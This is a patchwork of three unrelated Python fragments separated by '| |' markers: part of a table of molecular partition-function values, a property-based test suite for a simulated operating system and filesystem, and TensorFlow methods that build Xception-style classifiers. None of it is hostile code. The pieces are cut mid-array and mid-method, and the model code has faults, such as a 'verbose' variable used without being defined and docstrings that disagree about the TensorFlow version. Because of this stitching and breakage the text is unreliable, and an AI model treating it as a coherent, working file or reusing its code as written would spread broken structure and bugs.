2.766138E+04, 2.786190E+04, 2.806319E+04, 2.826524E+04, 2.846807E+04, 2.867167E+04,
2.887604E+04, 2.908118E+04, 2.928709E+04, 2.949378E+04, 2.970124E+04, 2.990947E+04,
3.011847E+04, 3.032825E+04, 3.053880E+04, 3.075013E+04, 3.096224E+04, 3.117512E+04,
3.138877E+04, 3.160321E+04, 3.181842E+04, 3.203441E+04, 3.225117E+04, 3.246872E+04,
3.268704E+04, 3.290614E+04, 3.312602E+04, 3.334669E+04, 3.356813E+04, 3.379035E+04,
3.401336E+04, 3.423714E+04, 3.446171E+04, 3.468706E+04, 3.491320E+04, 3.514011E+04,
3.536782E+04, 3.559630E+04, 3.582557E+04, 3.605563E+04, 3.628647E+04, 3.651809E+04,
3.675050E+04, 3.698370E+04, 3.721769E+04, 3.745246E+04, 3.768802E+04, 3.792437E+04,
3.816150E+04, 3.839943E+04, 3.863814E+04, 3.887764E+04, 3.911794E+04, 3.935902E+04,
3.960089E+04, 3.984356E+04, 4.008701E+04, 4.033126E+04, 4.057630E+04, 4.082213E+04,
4.106875E+04, 4.131617E+04, 4.156438E+04, 4.181338E+04, 4.206318E+04, 4.231377E+04,
4.256515E+04, 4.281734E+04, 4.307031E+04, 4.332408E+04, 4.357865E+04, 4.383401E+04,
4.409017E+04, 4.434713E+04, 4.460488E+04, 4.486344E+04, 4.512278E+04, 4.538293E+04,
4.564388E+04, 4.590562E+04, 4.616816E+04, 4.643150E+04, 4.669564E+04, 4.696058E+04,
4.722632E+04, 4.749286E+04, 4.776021E+04, 4.802835E+04, 4.829729E+04, 4.856703E+04,
4.883758E+04, 4.910893E+04, 4.938108E+04, 4.965403E+04, 4.992778E+04, 5.020234E+04,
5.047770E+04, 5.075386E+04, 5.103083E+04, 5.130860E+04, 5.158717E+04, 5.186655E+04,
5.214674E+04, 5.242772E+04, 5.270951E+04, 5.299211E+04, 5.327551E+04, 5.355972E+04,
5.384474E+04, 5.413056E+04, 5.441718E+04, 5.470461E+04, 5.499285E+04, 5.528189E+04,
5.557175E+04, 5.586240E+04, 5.615387E+04, 5.644614E+04, 5.673922E+04, 5.703311E+04,
5.732781E+04, 5.762331E+04, 5.791962E+04, 5.821674E+04, 5.851467E+04, 5.881341E+04,
5.911295E+04, 5.941331E+04, 5.971447E+04, 6.001644E+04, 6.031922E+04, 6.062281E+04,
6.092721E+04, 6.123242E+04, 6.153844E+04, 6.184527E+04, 6.215291E+04, 6.246136E+04,
6.277062E+04, 6.308069E+04, 6.339157E+04, 6.370326E+04, 6.401576E+04, 6.432907E+04,
6.464320E+04, 6.495813E+04, 6.527387E+04, 6.559043E+04, 6.590779E+04, 6.622597E+04,
6.654496E+04, 6.686476E+04, 6.718537E+04, 6.750679E+04, 6.782902E+04, 6.815206E+04,
6.847592E+04, 6.880058E+04, 6.912606E+04, 6.945235E+04, 6.977945E+04, 7.010736E+04,
7.043609E+04, 7.076562E+04, 7.109597E+04, 7.142713E+04, 7.175910E+04, 7.209188E+04,
7.242547E+04, 7.275988E+04, 7.309509E+04, 7.343112E+04, 7.376796E+04, 7.410561E+04,
7.444407E+04, 7.478335E+04, 7.512343E+04, 7.546433E+04, 7.580603E+04, 7.614855E+04,
7.649188E+04, 7.683602E+04, 7.718098E+04, 7.752674E+04, 7.787331E+04, 7.822070E+04,
7.856889E+04, 7.891790E+04, 7.926772E+04, 7.961835E+04, 7.996979E+04, 8.032204E+04,
8.067510E+04, 8.102897E+04, 8.138365E+04, 8.173914E+04, 8.209544E+04, 8.245255E+04,
8.281047E+04, 8.316920E+04, 8.352874E+04, 8.388909E+04, 8.425025E+04, 8.461221E+04,
8.497499E+04,
])
# ---------------------- M = 6, I = 1 ---------------------------
M = 6
I = 1
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[2]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
5.000000E+00, 1.273695E+01, 3.049472E+01, 5.478766E+01, 8.367753E+01, 1.164151E+02,
1.525835E+02, 1.918873E+02, 2.341011E+02, 2.790524E+02, 3.266165E+02, 3.767179E+02,
4.293326E+02, 4.844902E+02, 5.422734E+02, 6.028155E+02, 6.662963E+02, 7.329384E+02,
8.030016E+02, 8.767796E+02, 9.545964E+02, 1.036804E+03, 1.123780E+03, 1.215929E+03,
1.313679E+03, 1.417485E+03, 1.527828E+03, 1.645218E+03, 1.770193E+03, 1.903324E+03,
2.045215E+03, 2.196504E+03, 2.357871E+03, 2.530032E+03, 2.713751E+03, 2.909836E+03,
3.119144E+03, 3.342585E+03, 3.581125E+03, 3.835788E+03, 4.107662E+03, 4.397900E+03,
4.707726E+03, 5.038440E+03, 5.391417E+03, 5.768118E+03, 6.170091E+03, 6.598978E+03,
7.056516E+03, 7.544548E+03, 8.065026E+03, 8.620015E+03, 9.211704E+03, 9.842405E+03,
1.051457E+04, 1.123079E+04, 1.199379E+04, 1.280649E+04, 1.367192E+04, 1.459334E+04,
1.557414E+04, 1.661792E+04, 1.772850E+04, 1.890986E+04, 2.016624E+04, 2.150208E+04,
2.292207E+04, 2.443115E+04, 2.603450E+04, 2.773758E+04, 2.954614E+04, 3.150651E+04,
3.355181E+04, 3.572292E+04, 3.802703E+04, 4.047168E+04, 4.306485E+04, 4.581488E+04,
4.873055E+04, 5.182111E+04, 5.509623E+04, 5.856610E+04, 6.224140E+04, 6.613336E+04,
7.025373E+04, 7.461487E+04, 7.922970E+04, 8.411182E+04, 8.927543E+04, 9.473544E+04,
1.005075E+05, 1.066079E+05, 1.130538E+05, 1.198631E+05, 1.270545E+05, 1.346478E+05,
1.426634E+05, 1.511227E+05, 1.600483E+05, 1.694635E+05, 1.793929E+05, 1.898620E+05,
2.008977E+05, 2.125277E+05, 2.247814E+05, 2.376890E+05, 2.512823E+05, 2.655945E+05,
2.806600E+05, 2.965148E+05, 3.131965E+05, 3.307442E+05, 3.491987E+05, 3.686022E+05,
3.889992E+05, 4.104356E+05, 4.329593E+05, 4.566203E+05, 4.814703E+05, 5.075634E+05,
5.349557E+05, 5.637057E+05, 5.938740E+05, 6.255236E+05, 6.587202E+05, 6.935319E+05,
7.300294E+05, 7.682862E+05, 8.083785E+05, 8.503856E+05, 8.943897E+05, 9.404760E+05,
9.887330E+05, 1.039252E+06, 1.092129E+06, 1.147463E+06, 1.205355E+06, 1.265911E+06,
1.329242E+06, 1.395461E+06, 1.464686E+06, 1.537038E+06, 1.612646E+06, 1.691638E+06,
1.774151E+06, 1.860324E+06, 1.950303E+06, 2.044237E+06, 2.142281E+06, 2.244596E+06,
2.351347E+06, 2.462706E+06, 2.578850E+06, 2.699960E+06, 2.826228E+06, 2.957846E+06,
3.095017E+06, 3.237950E+06, 3.386857E+06, 3.541963E+06, 3.703494E+06, 3.871687E+06,
4.046785E+06, 4.229040E+06, 4.418710E+06, 4.616063E+06, 4.821373E+06, 5.034924E+06,
5.257009E+06, 5.487928E+06, 5.727992E+06, 5.977520E+06, 6.236841E+06, 6.506295E+06,
6.786230E+06, 7.077006E+06,
])
# ---------------------- M = 6, I = 2 ---------------------------
M = 6
I = 2
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[2]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
1.000001E+01, 2.547411E+01, 6.098959E+01, 1.095756E+02, 1.673556E+02, 2.328309E+02,
3.051677E+02, 3.837737E+02, 4.682005E+02, 5.581019E+02, 6.532270E+02, 7.534273E+02,
8.586439E+02, 9.689291E+02, 1.084461E+03, 1.205482E+03, 1.332363E+03, 1.465530E+03,
1.605503E+03, 1.752860E+03, 1.908229E+03, 2.072336E+03, 2.245903E+03, 2.429737E+03,
2.624664E+03, 2.831592E+03, 3.051489E+03, 3.285303E+03, 3.534174E+03, 3.799126E+03,
4.081393E+03, 4.382239E+03, 4.702959E+03, 5.044945E+03, 5.409694E+03, 5.798822E+03,
6.213891E+03, 6.656804E+03, 7.129283E+03, 7.633410E+03, 8.171277E+03, 8.745069E+03,
9.357183E+03, 1.001001E+04, 1.070636E+04, 1.144891E+04, 1.224067E+04, 1.308471E+04,
1.398443E+04, 1.494334E+04, 1.596502E+04, 1.705351E+04, 1.821287E+04, 1.944758E+04,
2.076216E+04, 2.216156E+04, 2.365078E+04, 2.523547E+04, 2.692124E+04, 2.871415E+04,
3.062057E+04, 3.264725E+04, 3.480122E+04, 3.708988E+04, 3.952125E+04, 4.210358E+04,
4.484543E+04, 4.775615E+04, 5.084522E+04, 5.412274E+04, 5.759952E+04, 6.128669E+04,
6.519606E+04, 6.933999E+04, 7.373142E+04, 7.838393E+04, 8.331199E+04, 8.853045E+04,
9.405527E+04, 9.990284E+04, 1.060906E+05, 1.126365E+05, 1.195598E+05, 1.268805E+05,
1.346193E+05, 1.427982E+05, 1.514402E+05, 1.605692E+05, 1.702104E+05, 1.803902E+05,
1.911358E+05, 2.024762E+05, 2.144415E+05, 2.270628E+05, 2.403733E+05, 2.544072E+05,
2.692002E+05, 2.847901E+05, 3.012156E+05, 3.185180E+05, 3.367395E+05, 3.559247E+05,
3.761201E+05, 3.973740E+05, 4.197368E+05, 4.432611E+05, 4.680017E+05, 4.940161E+05,
5.213635E+05, 5.501059E+05, 5.803083E+05, 6.120376E+05, | |
import operator
import os as _os
from pathlib import Path
from string import ascii_letters
from itertools import chain, permutations
from functools import reduce
from fakeos import FakeOS
from hypothesis import given, assume, example
from hypothesis.strategies import text, sets, integers, lists, just
from filesystem import FakeDirectory, FakeFile, FakeFilesystem, \
FakeFilesystemWithPermissions
from fakeuser import FakeUser, Root
from unittest import TestCase
from operating_system import FakeWindows, FakeUnix
ILLEGAL_NAMES = ("", ".", "..")
class DirectoryCase(TestCase):
@given(text())
def test_mkdir_when_directory_already_exists(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
with self.assertRaises(FileExistsError):
os.mkdir("/" + directory)
@given(text())
def test_mkdir_when_parent_directory_doesnt_exist(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
with self.assertRaises(FileNotFoundError):
os.mkdir("/hello/" + directory)
@given(text(), text())
def test_mkdir_and_directory_exists_afterwards(self, directory: str, _file: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in _file and _file not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + _file)
assert os.filesystem.has(Path("/" + directory + "/" + _file))
@given(text())
def test_mkdir_works(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
@given(text())
def test_creating_root_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(directory)
assert os.filesystem.has_directory(Path(directory))
@given(text(), sets(text()))
@example("0", set())
def test_listdir_with_subdirectories_only(self, directory, subdirectories):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
for subdirectory in subdirectories:
assume(subdirectory not in ILLEGAL_NAMES)
assume("/" not in subdirectory)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
for subdirectory in subdirectories:
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(subdirectories) == sorted(os.listdir("/" + directory))
@given(text())
def test_listdir_empty_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == []
@given(text(), text())
def test_listdir_with_a_file_inside(self, directory, filename):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == [filename]
@given(text(), text(), text())
def test_listdir_with_a_file_and_a_directory_inside(self, directory,
filename, subdirectory):
assume(subdirectory != filename)
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
assume("/" not in subdirectory and subdirectory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(os.listdir("/" + directory)) == sorted([filename, subdirectory])
@given(text())
def test_makedirs_one_file_path(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path(path))]))
with self.assertRaises(OSError):
os.makedirs(path)
try:
os.makedirs(path, exist_ok=True)
except OSError:
self.fail()
@given(text())
@example("/")
@example("/0")
def test_makedirs_multiple_file_path(self, path: str):
assume("/" in path and not path.startswith("."))
os = FakeOS()
os.makedirs(path)
with self.assertRaises(OSError):
os.makedirs(path)
@given(text())
def test_makedirs_when_part_of_the_path_exists_as_and_is_a_file(self, path: str):
assume("/" in path)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
dirname = Path(path).joinpath("dirname")
with self.assertRaises(FileExistsError):
os.makedirs(dirname)
@given(text())
@example("0")
def test_rmdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
fullpath = "/" + path
os.makedirs(fullpath)
assert path in os.listdir("/")
os.rmdir(fullpath)
assert path not in os.listdir("/")
with self.assertRaises(FileNotFoundError):
os.rmdir(fullpath)
os.makedirs(fullpath + "/hello")
with self.assertRaises(OSError):
os.rmdir(fullpath)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path(path))])))
with self.assertRaises(NotADirectoryError):
os.rmdir(path)
class ChownCase(TestCase):
@given(text(), integers(), integers())
def test_chown_to_a_directory(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_file(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
os.chown(path, gid=gid, uid=uid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_nonexisting_fileobject(self, path: str, uid: int,
gid: int):
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chown(path, gid=gid, uid=uid)
@given(text(), integers(), integers())
def test_chown_not_changing_already_set_attributes(self, path: str,
uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
os.chown(path, uid=-1, gid=-1)
assert os.filesystem[path].gid == gid
assert os.filesystem[path].uid == uid
class ChmodCase(TestCase):
@given(text(), integers())
def test_chmod(self, path, mode):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chmod(path, mode)
assert os.filesystem[path].mode == mode
class FileCase(TestCase):
@given(text())
@example("0")
def test_remove_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path("hello/" + path))])))
os.mkdir("hello")
assert os.listdir("hello") == [path]
os.remove("hello/" + path)
assert os.listdir("hello") == []
@given(text())
def test_remove_a_directory(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
with self.assertRaises(IsADirectoryError):
os.remove(path)
@given(text())
def test_remove_a_non_existent_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.remove(path)
class CurrentDirectoryCase(TestCase):
@given(text())
def test_chdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chdir(path)
assert os.getcwd() == str(Path(path).absolute())
@given(text())
def test_chdir_directory_does_not_exist(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chdir(path)
@given(text())
def test_chdir_directory_path_is_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
with self.assertRaises(NotADirectoryError):
os.chdir(path)
class DeviceCase(TestCase):
@given(integers(), integers())
def test_makedev(self, major, minor):
assume(-1 < major < 2 ** 31 and -1 < minor < 2 ** 31)
os = FakeOS()
assert os.makedev(major, minor) == _os.makedev(major, minor)
@given(integers())
def test_major(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.major(device) == _os.major(device)
@given(integers())
def test_minor(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.minor(device) == _os.minor(device)
class RenameCase(TestCase):
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_directory(self, old, new):
assume(old != new)
os = FakeOS()
os.mkdir(old)
os.rename(old, new)
with self.assertRaises(FileNotFoundError):
old_file = os.filesystem[Path(old)]
try:
new_file = os.filesystem[Path(new)]
except FileNotFoundError:
self.fail("Filke was not renamed.")
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_directory(self, root, old, new):
os = FakeOS()
os.mkdir(root)
os.mkdir(root + "/" + old)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root) == [new]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_non_leaf_folder(self, old, new, inside):
os = FakeOS()
os.mkdir(old)
os.mkdir(old + "/" + inside)
os.rename(old, new)
assert os.listdir(new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_non_leaf_folder(self, old, new, inside, root):
os = FakeOS()
os.makedirs(root + "/" + old + "/" + inside)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root + "/" + new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_windows(self, old, new):
assume(old != new)
os = FakeOS(operating_system=FakeWindows())
os.mkdir(old)
os.mkdir(new)
with self.assertRaises(OSError):
os.rename(old, new)
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_unix(self, old, new, somefile):
assume(old != new)
os = FakeOS(operating_system=FakeUnix(),
filesystem=FakeFilesystem(files=[FakeFile(Path(old)),
FakeFile(Path(new))],
operating_system=FakeUnix()))
os.rename(old, new)
os.filesystem[Path(new)]
with self.assertRaises(OSError):
fileobject = os.filesystem[Path(old)]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_a_folder_and_changing_its_hierarchy(self, a, b, c, d, e):
assume(e != b)
os = FakeOS()
os.makedirs(a + "/" + b + "/" + c + "/" + d)
os.rename(a + "/" + b + "/" + c, a + "/" + e)
assert set(os.listdir(a)) == {b, e}
assert os.listdir(a + "/" + e) == [d]
@given(text(alphabet=ascii_letters, min_size=1))
def test_renaming_to_the_same_thing(self, path):
os = FakeOS()
os.mkdir(path)
os.rename(path, path)
class AccessCase(TestCase):
def test_access_when_root(self):
os = FakeOS(user=Root())
os.mkdir("/", mode=0o000)
for access_modifier in (os.X_OK, os.W_OK, os.R_OK, os.F_OK):
assert os.access("/", access_modifier)
def test_access_exist(self):
os = FakeOS()
os.mkdir("/")
assert os.access("/", os.F_OK) and not os.access("other", os.F_OK)
def test_access_effective_ids(self):
os = FakeOS(user=FakeUser(gid=-2, uid=-2, is_sudoer=False))
os.setgid(0)
os.setuid(0)
assert os.getgid() == 0
assert os.getuid() == 0
os.mkdir("/", mode=0o070) # Group only
os.setgid(-7)
os.setuid(-7)
os.seteuid(0)
os.setegid(0)
assert not os.access("/", mode=os.R_OK)
assert os.access("/", mode=os.R_OK, effective_ids=True)
def test_access_when_owner(self):
os = FakeOS(user=FakeUser(gid=14, uid=42))
os.mkdir("r", mode=0o400)
os.mkdir("w", mode=0o200)
os.mkdir("x", mode=0o100)
os.mkdir("rw", mode=0o600)
os.mkdir("wx", mode=0o300)
os.mkdir("rx", mode=0o500)
os.mkdir("rwx", mode=0o700)
os.filesystem.set_user(FakeUser(gid=18, uid=42))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
| |
(1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.20 model (compiled, untrained)
"""
# Input validation
self.__require_params(input_shape = input_shape)
if (not gpu_device) or self.__GPU_count == 0:
gpu_device = "/cpu:0"
# Model hyperparameters and metadata
model_name = 'Binary Classification Xception'
opt = Adam(lr = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
loss = CategoricalCrossentropy(from_logits = True)
metrics = ['accuracy']
# Construct model & compile
with tf.device(gpu_device):
# input image size
input_img = layers.Input(shape = input_shape, dtype = tf.float32)
# Block 1
x = Conv2D(32, (1, 3), strides=(1, 3), use_bias=False) (input_img)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2D(64, (1, 3), use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
residual = Conv2D(128, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 2
x = SeparableConv2D(128, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(128, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 2 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
residual = Conv2D(256, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 3
x = Activation('relu')(x)
x = SeparableConv2D(256, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(256, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 3 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
residual = Conv2D(728, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 4
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
# Block 5 - 12
for i in range(8):
residual = x
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = layers.add([x, residual])
residual = Conv2D(1024, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 13
x = Activation('relu')(x)
x = SeparableConv2D(728, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(1024, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 13 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
# Block 14
x = SeparableConv2D(1536, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
# Block 14 part 2
x = SeparableConv2D(2048, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
# Fully Connected Layer
x = GlobalAveragePooling2D()(x)
x = layers.Dense(2, dtype = tf.float32, name = 'dense_2_final') (x)
model = models.Model(input_img, x, name = model_name)
model.compile(loss = loss, optimizer = opt, metrics = metrics)
# Print verbose output to console
if verbose:
self.__verbose_print(model, model_name, input_shape, opt, loss, metrics)
return model
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
### Xception (Abbreviated w/ CLS Residual)
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
def get_xception_abbreviated_clsresidual(self, input_shape = (1, 1024, 26), gpu_device = "/gpu:1"):
r"""Returns the TensorFlow 2.2 implementation of Xception (Abbreviated w/ CLS Residual).
Inspired by Chollet 2017 : http://arxiv.org/abs/1610.02357
Args:
input_shape (tuple, optional): Shape of the input tensor. Defaults to (1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.20 model (compiled, untrained)
"""
# Input validation
self.__require_params(input_shape = input_shape)
if (not gpu_device) or self.__GPU_count == 0:
gpu_device = "/cpu:0"
# Model hyperparameters and metadata
model_name = 'Binary Classification Xception (Abbreviated w/ CLS Residual)'
opt = Adam(lr = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
loss = CategoricalCrossentropy(from_logits = True)
metrics = ['accuracy']
# Construct model & compile
with tf.device(gpu_device):
# input image size
input_img = layers.Input(shape = input_shape, dtype = tf.float32)
# pull the last channel layer for residual connection layer
inp_seq = input_img[:,:,:,-1]
inp_seq = tf.squeeze(inp_seq, axis = 1)
# Block 1
x = Conv2D(64, (1, 3), strides=(1, 3), use_bias=False) (input_img)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2D(128, (1, 3), use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
residual = Conv2D(512, (1, 1), strides=(1, 2), padding='same', use_bias=False)(x)
residual = BatchNormalization()(residual)
# Block 2
x = SeparableConv2D(256, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(512, (1, 3), padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
# Block 2 Pool
x = AveragePooling2D((1, 3), strides=(1, 2), padding='same')(x)
x = layers.add([x, residual])
# Fully Connected Layer
x = GlobalAveragePooling2D()(x)
# add the skip level residual back to the last CLS token
x = layers.concatenate([x, inp_seq])
x = layers.Dense(2, dtype = tf.float32, name = 'dense_2_final') (x)
model = models.Model(input_img, x, name = model_name)
model.compile(loss = loss, optimizer = opt, metrics = metrics)
# Print verbose output to console
if verbose:
self.__verbose_print(model, model_name, input_shape, opt, loss, metrics)
return model
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
### Xception (Abbreviated w/ CLS Residual)
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
def get_adapaterpooling_meanavg(self, input_shape = (1, 1024, 26), gpu_device = "/gpu:0", verbose = True):
r"""Returns the TensorFlow 2.2 implementation of Adapter Pooler Mean Average model.
tensor contraction along the channel dimension perfomed using simple mean averaging.
adapter pooler layer inspired by Houlsby et al. 2019 : https://arxiv.org/abs/1902.00751v2
Args:
input_shape (tuple, optional): Shape of the input tensor. Defaults to (1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.20 model (compiled, untrained)
"""
# Input validation
self.__require_params(input_shape = input_shape)
if (not gpu_device) or self.__GPU_count == 0:
gpu_device = "/cpu:0"
